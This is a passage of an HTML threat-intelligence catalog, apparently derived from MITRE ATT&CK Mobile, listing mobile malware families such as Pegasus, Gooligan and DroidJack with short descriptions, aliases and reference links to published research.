<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/">http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adups_mob_s0025"><a class="anchor" href="#_adups_mob_s0025"></a><a class="link" href="#_adups_mob_s0025">Adups - MOB-S0025</a></h3>
<div class="paragraph">
<p>Adups, software pre-installed onto Android devices including those made by BLU Products, reportedly transmitted sensitive data to a Chinese server. The capability was reportedly designed "to help a Chinese phone manufacturer monitor user behavior" and "was not intended for American phones". (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor).</p>
</div>
<div class="paragraph">
<p>Aliases: Adups</p>
</div>
<div class="paragraph">
<p>Adups - MOB-S0025 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Adups</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1426. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0025">https://attack.mitre.org/mobile/index.php/Software/MOB-S0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html">https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534">http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pegasus_mob_s0005"><a class="anchor" href="#_pegasus_mob_s0005"></a><a class="link" href="#_pegasus_mob_s0005">Pegasus - MOB-S0005</a></h3>
<div class="paragraph">
<p>Discovered by Lookout (Citation: Lookout-Pegasus) and Citizen Lab (Citation: PegasusCitizenLab), Pegasus escalates privileges on iOS devices and uses its privileged access to collect a variety of sensitive information.</p>
</div>
<div class="paragraph">
<p>Aliases: Pegasus</p>
</div>
<div class="paragraph">
<p>Pegasus - MOB-S0005 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pegasus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1427. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0005">https://attack.mitre.org/mobile/index.php/Software/MOB-S0005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf">https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/">https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rumms_mob_s0029"><a class="anchor" href="#_rumms_mob_s0029"></a><a class="link" href="#_rumms_mob_s0029">RuMMS - MOB-S0029</a></h3>
<div class="paragraph">
<p>RuMMS is a family of Android malware (Citation: FireEye-RuMMS).</p>
</div>
<div class="paragraph">
<p>Aliases: RuMMS</p>
</div>
<div class="paragraph">
<p>RuMMS - MOB-S0029 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RuMMS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1428. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0029">https://attack.mitre.org/mobile/index.php/Software/MOB-S0029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html">https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hummingbad_mob_s0038"><a class="anchor" href="#_hummingbad_mob_s0038"></a><a class="link" href="#_hummingbad_mob_s0038">HummingBad - MOB-S0038</a></h3>
<div class="paragraph">
<p>HummingBad is a family of Android malware that generates fraudulent advertising revenue and has the ability to obtain root access on older, vulnerable versions of Android (Citation: ArsTechnica-HummingBad).</p>
</div>
<div class="paragraph">
<p>Aliases: HummingBad</p>
</div>
<div class="paragraph">
<p>HummingBad - MOB-S0038 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HummingBad</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1429. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0038">https://attack.mitre.org/mobile/index.php/Software/MOB-S0038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/">http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_opfake_a_mob_s0024"><a class="anchor" href="#_trojan_sms_androidos_opfake_a_mob_s0024"></a><a class="link" href="#_trojan_sms_androidos_opfake_a_mob_s0024">Trojan-SMS.AndroidOS.OpFake.a - MOB-S0024</a></h3>
<div class="paragraph">
<p>Android malware described by Kaspersky (Citation: Kaspersky-MobileMalware).</p>
</div>
<div class="paragraph">
<p>Aliases: Trojan-SMS.AndroidOS.OpFake.a</p>
</div>
<div class="paragraph">
<p>Trojan-SMS.AndroidOS.OpFake.a - MOB-S0024 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan-SMS.AndroidOS.OpFake.a</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1430. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0024">https://attack.mitre.org/mobile/index.php/Software/MOB-S0024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/">https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dendroid_mob_s0017"><a class="anchor" href="#_dendroid_mob_s0017"></a><a class="link" href="#_dendroid_mob_s0017">Dendroid - MOB-S0017</a></h3>
<div class="paragraph">
<p>Android malware family analyzed by Lookout (Citation: Lookout-Dendroid).</p>
</div>
<div class="paragraph">
<p>Aliases: Dendroid</p>
</div>
<div class="paragraph">
<p>Dendroid - MOB-S0017 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dendroid</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1431. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0017">https://attack.mitre.org/mobile/index.php/Software/MOB-S0017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2014/03/06/dendroid/">https://blog.lookout.com/blog/2014/03/06/dendroid/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mazarbot_mob_s0019"><a class="anchor" href="#_mazarbot_mob_s0019"></a><a class="link" href="#_mazarbot_mob_s0019">MazarBOT - MOB-S0019</a></h3>
<div class="paragraph">
<p>Android malware analyzed by Scandinavian security group CSIS as described in a Tripwire post (Citation: Tripwire-MazarBOT).</p>
</div>
<div class="paragraph">
<p>Aliases: MazarBOT</p>
</div>
<div class="paragraph">
<p>MazarBOT - MOB-S0019 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MazarBOT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1432. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0019">https://attack.mitre.org/mobile/index.php/Software/MOB-S0019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/">https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gooligan_mob_s0006"><a class="anchor" href="#_gooligan_mob_s0006"></a><a class="link" href="#_gooligan_mob_s0006">Gooligan - MOB-S0006</a></h3>
<div class="paragraph">
<p>The (Citation: Gooligan) malware family, revealed by Check Point, runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal "authentication tokens that can be used to access data from Google Play, Gmail, Google Photos, Google Docs, G Suite, Google Drive, and more." (Citation: Gooligan)</p>
</div>
<div class="paragraph">
<p>Google (Citation: Ludwig-GhostPush) and LookoutLookout- (Citation: Gooligan) describe (Citation: Gooligan) as part of the Ghost Push Android malware family.</p>
</div>
<div class="paragraph">
<p>Aliases: (Citation: Gooligan)</p>
</div>
<div class="paragraph">
<p>Gooligan - MOB-S0006 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gooligan</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1433. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0006">https://attack.mitre.org/mobile/index.php/Software/MOB-S0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/">http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi">https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oldboot_mob_s0001"><a class="anchor" href="#_oldboot_mob_s0001"></a><a class="link" href="#_oldboot_mob_s0001">OldBoot - MOB-S0001</a></h3>
<div class="paragraph">
<p>OldBoot is a family of Android malware described in a report from The Hacker News (Citation: HackerNews-OldBoot).</p>
</div>
<div class="paragraph">
<p>Aliases: OldBoot</p>
</div>
<div class="paragraph">
<p>OldBoot - MOB-S0001 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OldBoot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1434. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0001">https://attack.mitre.org/mobile/index.php/Software/MOB-S0001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://thehackernews.com/2014/01/first-widely-distributed-android.html">http://thehackernews.com/2014/01/first-widely-distributed-android.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wirelurker_mob_s0028"><a class="anchor" href="#_wirelurker_mob_s0028"></a><a class="link" href="#_wirelurker_mob_s0028">WireLurker - MOB-S0028</a></h3>
<div class="paragraph">
<p>WireLurker is a family of macOS malware that targets iOS devices connected over USB (Citation: PaloAlto-WireLurker).</p>
</div>
<div class="paragraph">
<p>Aliases: WireLurker</p>
</div>
<div class="paragraph">
<p>WireLurker - MOB-S0028 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>WireLurker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1435. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0028">https://attack.mitre.org/mobile/index.php/Software/MOB-S0028</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_droidjack_rat_mob_s0036"><a class="anchor" href="#_droidjack_rat_mob_s0036"></a><a class="link" href="#_droidjack_rat_mob_s0036">DroidJack RAT - MOB-S0036</a></h3>
<div class="paragraph">
<p>Android remote access trojan (RAT) that has been observed to pose as legitimate applications including the Super Mario Run (Citation: Zscaler-SuperMarioRun) and Pokemon GO games (Citation: Proofpoint-Droidjack).</p>
</div>
<div class="paragraph">
<p>Aliases: DroidJack RAT</p>
</div>
<div class="paragraph">
<p>DroidJack RAT - MOB-S0036 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DroidJack RAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1436. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0036">https://attack.mitre.org/mobile/index.php/Software/MOB-S0036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.zscaler.com/blogs/research/super-mario-run-malware-2--droidjack-rat">https://www.zscaler.com/blogs/research/super-mario-run-malware-2--droidjack-rat</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app">https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hummingwhale_mob_s0037"><a class="anchor" href="#_hummingwhale_mob_s0037"></a><a class="link" href="#_hummingwhale_mob_s0037">HummingWhale - MOB-S0037</a></h3>
<div class="paragraph">
<p>The HummingWhale Android malware family "includes new virtual machine techniques that allow the malware to perform ad fraud better than ever". (Citation: ArsTechnica-HummingWhale)</p>
</div>
<div class="paragraph">
<p>Aliases: HummingWhale</p>
</div>
<div class="paragraph">
<p>HummingWhale - MOB-S0037 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>HummingWhale</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1437. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0037">https://attack.mitre.org/mobile/index.php/Software/MOB-S0037</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/">http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_androidos_anserver_a_mob_s0026"><a class="anchor" href="#_androidos_anserver_a_mob_s0026"></a><a class="link" href="#_androidos_anserver_a_mob_s0026">ANDROIDOS_ANSERVER.A - MOB-S0026</a></h3>
<div class="paragraph">
<p>ANDROIDOS_ANSERVER.A is Android malware novel for using encrypted content within a blog site for command and control (Citation: TrendMicro-Anserver).</p>
</div>
<div class="paragraph">
<p>Aliases: ANDROIDOS_ANSERVER.A</p>
</div>
<div class="paragraph">
<p>ANDROIDOS_ANSERVER.A - MOB-S0026 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ANDROIDOS_ANSERVER.A</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1438. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0026">https://attack.mitre.org/mobile/index.php/Software/MOB-S0026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/">http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trojan_sms_androidos_fakeinst_a_mob_s0022"><a class="anchor" href="#_trojan_sms_androidos_fakeinst_a_mob_s0022"></a><a class="link" href="#_trojan_sms_androidos_fakeinst_a_mob_s0022">Trojan-SMS.AndroidOS.FakeInst.a - MOB-S0022</a></h3>
<div class="paragraph">
<p>Android malware described by Kaspersky (Citation: Kaspersky-MobileMalware).</p>
</div>
<div class="paragraph">
<p>Aliases: Trojan-SMS.AndroidOS.FakeInst.a</p>
</div>
<div class="paragraph">
<p>Trojan-SMS.AndroidOS.FakeInst.a - MOB-S0022 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trojan-SMS.AndroidOS.FakeInst.a</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1439. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0022">https://attack.mitre.org/mobile/index.php/Software/MOB-S0022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/">https://securelist.com/analysis/kaspersky-security-bulletin/58335/mobile-malware-evolution-2013/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_notcompatible_mob_s0015"><a class="anchor" href="#_notcompatible_mob_s0015"></a><a class="link" href="#_notcompatible_mob_s0015">NotCompatible - MOB-S0015</a></h3>
<div class="paragraph">
<p>Android malware family analyzed by Lookout (Citation: Lookout-NotCompatible)</p>
</div>
<div class="paragraph">
<p>Aliases: NotCompatible</p>
</div>
<div class="paragraph">
<p>NotCompatible - MOB-S0015 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NotCompatible</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1440. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0015">https://attack.mitre.org/mobile/index.php/Software/MOB-S0015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2014/11/19/notcompatible/">https://blog.lookout.com/blog/2014/11/19/notcompatible/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_x_agent_mob_s0030"><a class="anchor" href="#_x_agent_mob_s0030"></a><a class="link" href="#_x_agent_mob_s0030">X-Agent - MOB-S0030</a></h3>
<div class="paragraph">
<p>The X-Agent Android malware was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data for where it was used and hence the potential location of Ukrainian artillery (Citation: CrowdStrike-Android).</p>
</div>
<div class="paragraph">
<p>Aliases: X-Agent</p>
</div>
<div class="paragraph">
<p>X-Agent - MOB-S0030 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>X-Agent</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1441. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0030">https://attack.mitre.org/mobile/index.php/Software/MOB-S0030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf">https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_twitoor_mob_s0018"><a class="anchor" href="#_twitoor_mob_s0018"></a><a class="link" href="#_twitoor_mob_s0018">Twitoor - MOB-S0018</a></h3>
<div class="paragraph">
<p>Twitoor is a family of Android malware described by ESET (Citation: ESET-Twitoor).</p>
</div>
<div class="paragraph">
<p>Aliases: Twitoor</p>
</div>
<div class="paragraph">
<p>Twitoor - MOB-S0018 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Twitoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1442. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0018">https://attack.mitre.org/mobile/index.php/Software/MOB-S0018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/">http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obad_mob_s0002"><a class="anchor" href="#_obad_mob_s0002"></a><a class="link" href="#_obad_mob_s0002">OBAD - MOB-S0002</a></h3>
<div class="paragraph">
<p>OBAD is a family of Android malware (Citation: TrendMicro-Obad).</p>
</div>
<div class="paragraph">
<p>Aliases: OBAD</p>
</div>
<div class="paragraph">
<p>OBAD - MOB-S0002 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OBAD</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1443. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0002">https://attack.mitre.org/mobile/index.php/Software/MOB-S0002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/">http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_android_chuli_a_mob_s0020"><a class="anchor" href="#_android_chuli_a_mob_s0020"></a><a class="link" href="#_android_chuli_a_mob_s0020">Android/Chuli.A - MOB-S0020</a></h3>
<div class="paragraph">
<p>As reported by Kaspersky (Citation: Kaspersky-WUC), a spear phishing message was sent to activist groups containing a malicious Android application as an attachment.</p>
</div>
<div class="paragraph">
<p>Aliases: Android/Chuli.A</p>
</div>
<div class="paragraph">
<p>Android/Chuli.A - MOB-S0020 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Android/Chuli.A</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1444. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0020">https://attack.mitre.org/mobile/index.php/Software/MOB-S0020</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/35552/android-trojan-found-in-targeted-attack-58/">https://securelist.com/blog/incidents/35552/android-trojan-found-in-targeted-attack-58/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pjapps_mob_s0007"><a class="anchor" href="#_pjapps_mob_s0007"></a><a class="link" href="#_pjapps_mob_s0007">PJApps - MOB-S0007</a></h3>
<div class="paragraph">
<p>According to Lookout (Citation: Lookout-EnterpriseApps), the PJApps Android malware family "may collect and leak the victims phone number, mobile device unique identifier (IMEI), and location. In order to make money, it may send messages to premium SMS numbers. PJApps also has the ability to download further applications to the device."</p>
</div>
<div class="paragraph">
<p>Aliases: PJApps</p>
</div>
<div class="paragraph">
<p>PJApps - MOB-S0007 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PJApps</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1445. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0007">https://attack.mitre.org/mobile/index.php/Software/MOB-S0007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2016/05/25/spoofed-apps/">https://blog.lookout.com/blog/2016/05/25/spoofed-apps/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_androidoverlaymalware_mob_s0012"><a class="anchor" href="#_androidoverlaymalware_mob_s0012"></a><a class="link" href="#_androidoverlaymalware_mob_s0012">AndroidOverlayMalware - MOB-S0012</a></h3>
<div class="paragraph">
<p>Android malware analyzed by FireEye (Citation: FireEye-AndroidOverlay).
According to their analysis, "three campaigns in Europe used view overlay techniques&#8230;&#8203;to present nearly identical credential input UIs as seen in benign apps, subsequently tricking unwary users into providing their banking credentials."</p>
</div>
<div class="paragraph">
<p>Aliases: AndroidOverlayMalware</p>
</div>
<div class="paragraph">
<p>AndroidOverlayMalware - MOB-S0012 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AndroidOverlayMalware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1446. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Software/MOB-S0012">https://attack.mitre.org/mobile/index.php/Software/MOB-S0012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/06/latest-android-overlay-malware-spreading-in-europe.html">https://www.fireeye.com/blog/threat-research/2016/06/latest-android-overlay-malware-spreading-in-europe.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zerghelper_mob_s0003"><a class="anchor" href="#_zerghelper_mob_s0003"></a><a class="link" href="#_zerghelper_mob_s0003">ZergHelper - MOB-S0003</a></h3>
<div class="paragraph">
